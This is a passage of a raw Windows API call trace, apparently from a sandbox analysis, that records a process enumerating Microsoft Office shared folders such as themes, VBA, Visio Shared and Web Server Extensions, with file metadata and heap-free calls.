ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0169.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.629] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0169.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.630] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0169.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.631] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0169.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.633] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0169.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.634] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0169.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.635] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="QUAD", cAlternateFileName="")) returned 1 [0169.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.636] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0169.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.638] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="REFINED", cAlternateFileName="")) returned 1 [0169.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.639] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0169.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.640] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0169.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.641] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0169.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.642] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x289576aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x289576aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SATIN", cAlternateFileName="")) returned 1 [0169.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.644] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SKY", cAlternateFileName="")) returned 1 [0169.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.645] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c609b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c609b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SLATE", cAlternateFileName="")) returned 1 [0169.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.663] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c3a755, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c3a755, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SONORA", cAlternateFileName="")) returned 1 [0169.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.997] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SPRING", cAlternateFileName="")) returned 1 [0169.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.998] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x28551719, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x28551719, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0169.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.998] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c3a755, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c3a755, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0169.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.998] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c3a755, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0169.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.999] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27c86bce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0170.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.006] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0170.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.006] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="WATERMAR", cAlternateFileName="")) returned 0 [0170.007] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0170.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.007] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0170.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.007] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8aa06f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8aa06f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ENFR", cAlternateFileName="")) returned 1 [0170.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.007] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8aa06f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ESEN", cAlternateFileName="")) returned 1 [0170.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.008] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63a12a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc91c74d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FREN", cAlternateFileName="")) returned 1 [0170.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.008] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27cace65, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27cace65, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27cace65, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="MSB1CACH.LEX", cAlternateFileName="")) returned 1 [0170.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.008] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8c279f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca8c279f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0170.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.009] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8c279f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb5e071a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x42d088, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBE7.DLL", cAlternateFileName="")) returned 1 [0170.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.009] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca8c279f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf24004e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf24004e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 0 [0170.009] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0170.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.009] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52ea133, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0170.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.011] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52ea133, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x62b5b1e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x62b5b1e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="Fonts", cAlternateFileName="")) returned 0 [0170.011] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0170.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.012] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0170.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.012] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27d1f57e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x239ec0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0170.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.012] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca27806, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xca27806, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0170.012] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0170.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.012] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="16", cAlternateFileName="")) returned 0 [0170.012] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0170.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.015] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0170.015] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.015] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e16872b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e16872b, ftLastAccessTime.dwHighDateTime=0x1d327e8, 